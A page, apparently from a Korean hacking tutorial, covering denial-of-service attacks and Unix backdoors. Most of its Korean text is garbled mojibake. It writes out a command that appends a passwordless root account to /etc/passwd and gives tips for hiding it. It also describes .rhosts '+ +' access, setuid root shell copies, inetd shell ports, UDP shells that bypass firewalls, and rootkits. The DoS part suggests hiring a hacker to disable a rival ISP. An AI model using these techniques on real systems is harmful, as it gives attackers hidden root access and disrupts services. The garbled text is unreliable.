    DOS(Denial Of Service)´Â ¼­ºñ½º °ÅºÎ °ø°ÝÀÌ´Ù. ½±°Ô Ç®ÀÌÇÏÀÚ¸é °ø°Ý È£½ºÆ®ÀÇ ¼­ºñ½º(ftp, smtp, telnet....)µéÀÌ Á¦ ±¸½ÇÀ» ¸øÇϵµ·Ï ¸ÛûÇÏ°Ô ¸¸µé¾î ¹ö¸®´Â °ø°ÝÀÌ´Ù. ÀÌ·± °ø°ÝÀº ¿ì¸®µé¿¡°Ô´Â º° µµ¿òÀÌ ¾ÊµÇ°ÚÁö¸¸ ¸¸ÀÏ A¶ó´Â ÀÎÅÍ³Ý ¼­ºñ½º ¾÷ü(ISP)°¡ B¶ó´Â ¼­ºñ½º ¾÷ü¿Í °æÀïÀ» ¹úÀÌ°í ÀÖ´Ù¸é? ´ç¿¬È÷ ¿©·¯ºÐµéÀº ¼­ºñ½º°¡ Àß µÇ°í ºü¸¥ ÀÎÅÍ³Ý ¼­ºñ½º ¾÷ü¸¦ ¼±ÅÃÇÒ °ÍÀÌ´Ù. ±×·³ A¿¡¼­ °í¿ëÇÑ ÇØÄ¿°¡ B¾÷üÀÇ ½Ã½ºÅÛÀ» DOS·Î °ø·«ÇÏ°Ô µÈ´Ù¸é.. B¾÷ü´Â ¼­ºñ½º°¡ Àß ¾ÊµÇ°ÚÁö.. »ç¿ëÀÚµéÀº ºÒÆíÀ» °Þ°Ô µÉ °ÍÀÌ°í.. µû¶ó¼­ ¼­ºñ½º°¡ Àß ¾ÊµÇ´Â B¾÷üº¸´Ù´Â A¾÷ü·Î »ç¿ëÀÚµéÀÌ ¸ô¸®°Ô µÉ °ÍÀÌ´Ù. DOSÀÇ °æ¿ì °ø°ÝÀÚ¸¦ Àß ÆľÇÇÒ ¼öµµ ¾ø´Ù. (spoofingÀ» »ç¿ëÇϹǷΠ´©°¡ ½Ã½ºÅÛÀ» DOS ·Î °ø°ÝÇÏ´ÂÁö ¹ß°ßÇس»±â ¾î·Æ´Ù.) ¹¹.. ÀÌ·±½ÄÀÌÁö...
    DOS°ø°Ý¿¡´Â smurf. teardrop, ping flooding, syn flooding, Æøź¸ÞÀÏ µîµî.. ¼ö¾øÀÌ ¸¹´Ù. ¼­ºñ½º¸¸ Á¦ ±¸½Ç¸øÇÏ°Ô²û ÇÒ ¼öµµ ÀÖÁö¸¸ ½Ã½ºÅÛ Àüü¸¦ ¸À°¡°Ô ÇÒ ¼öµµ ÀÖ´Ù.

    6.5 BackDoor

    - Æнº¿öµå ¹éµµ¾î

    > Æнº¿öµå »ìÆ캸±â :
    root:fVi3dx5Ytkdo:0:0:root:/:/bin/bash
    salsari:mKbj4T1sYji:501:100:salsari:/home/salsari:/bin/bash
    Æнº¿öµå´Â 7°³ÀÇ Çʵå·Î ³ª´¶´Ù.

    À¯Àú¸í : Æнº¿öµå : À¯ÀúID : ±×·ìID : À̸§ : Ȩ µð·ºÅ丮 : shell
    root : fVi3dx5Ytkdo : 0 : 0 : root : / : /bin/bash

    ¿ÀÈ£¶ó~ »ý°¢º¸´Ù ½±³×.. ¿©·¯ºÐµé.. ÀÌÇØ°¡ °¡Áö?
    ±×·³ Æнº¿öµå ÆÄÀÏ¿¡ ¹éµµ¾î¸¦ ½É¾îº¼±î?
    /etc/passwd¿¡ ´ÙÀ½°ú °°ÀÌ Áý¾î ³Ö¾îº¸ÀÚ.

    $ echo ¡°hacker::0:0:hacker:/:/bin/bash¡± >> /etc/passwd

    À¯ÀúID:±×·ìID°¡ 0:0À¸·Î ¼³Á¤µÇ¾î ÀÖ´Ù¸é ±×°ÍÀº rootÀÇ ±ÇÇÑÀ» °¡Áö°í ÀÖ´Ù´Â ¶æÀÌ´Ù.
    ±×·³ hacker¶ó´Â À¯Àú´Â ·çÆ®ÀÇ ±ÇÇÑÀ» °¡Áö°í Æнº¿öµå ¾øÀÌ ·Î±×ÀÎ ÇÒ ¼ö ÀÖ´Â°Ô µÇ³×...
    ÀÌ·± ¹æ¹ýÀ¸·Îµµ ¹éµµ¾î¸¦ ¸¸µé ¼ö ÀÖÁö¸¸ ½±°Ô µéų ¼ö ÀÖ´Ù. ±×·¡¼­ Æнº¿öµå Áß°£Á¤µµ¿¡ Áý¾î³ÖµçÁö ¾Æ´Ï¸é Àß »ç¿ëÇÏÁö ¾Ê´Â »ç¿ëÀÚÀÇ À¯ÀúID¿Í ±×·ìID¸¦ 0:0À¸·Î ¹Ù²Ù¾î »ç¿ëÇÒ ¼öµµ ÀÖ´Ù.

    - .rhosts ¹éµµ¾î
    À¯´Ð½ºÀÇ rsh, rlogin ¸í·É¾î´Â Ȩµð·ºÅ丮ÀÇ .rhosts ÆÄÀÏÀ» ÂüÁ¶ÇÏ¿© »ç¿ëÇÏ´Â ¸í·É¾îÀÌ´Ù.
    .rhosts¿¡ + + ¸¦ ³ÖÀ¸¸é ´©±¸µç Æнº¿öµå ¾øÀÌ ½Ã½ºÅÛ¿¡ Á¢¼ÓÇÒ ¼ö ÀÖ´Ù.

    - setuid ¹éµµ¾î
    2Àå¿¡¼­µµ ¼³¸íÇßµíÀÌ shellÀ» copyÇÏ¿© setuid¸¦ ºÙ¿©¼­ ¹éµµ¾î·Î »ç¿ëÇÑ´Ù.

    -r-sr-xr-x 3 root root 88620 1997³â 7¿ù 16ÀÏ /bin/hacker
    ¸ðµå º¯°æÀº root ±ÇÇÑÀ¸·Î chmod 4755 <filename>

    - TCP ½© ¹éµµ¾î
    inetd.conf ¿Í services ÆÄÀÏ¿¡ ½© Æ÷Æ®(TCP)¸¦ ¿­¾î¼­ Á¢¼ÓÇÏ´Â ¹éµµ¾î.

    - UDP ½© ¹éµµ¾î
    ¹æÈ­º®Àº DNS¼­ºñ½º ¶§¹®¿¡ UDP ÆÐŶÀº ¸·Áö ¾Ê´Â´Ù. ±× Á¡À» ÀÌ¿ëÇؼ­ UDP ½© ¹éµµ¾î¸¦ ¸¸µé¸é ¹«»çÅë°úÇÒ¼ö ÀÖ´Ù.

    - Rootkit
    ¹éµµ¾î ÇÁ·Î±×·¥µéÀ» ÀÚµ¿À¸·Î ¼³Ä¡ÇÏ¿©ÁÖ´Â ÇÁ·Î±×·¥.

    - Ä¿³Î ¹éµµ¾î
    Ä¿³Î ÀÚü¸¦ ¼öÁ¤ÇÏ¿© ¹éµµ¾î¸¦ ¸¸µç´Ù. °í±Þ ¹éµµ¾î ¹æ¹ýÀ¸·Î ¹ß°ßÀÌ °ÅÀÇ ºÒ°¡´ÉÇÏ´Ù.

    Âü°í ÀÚ·á
    internet hacking document
    security advisory
    8lgm advisory




¡ã top

homeÀ¸·Î...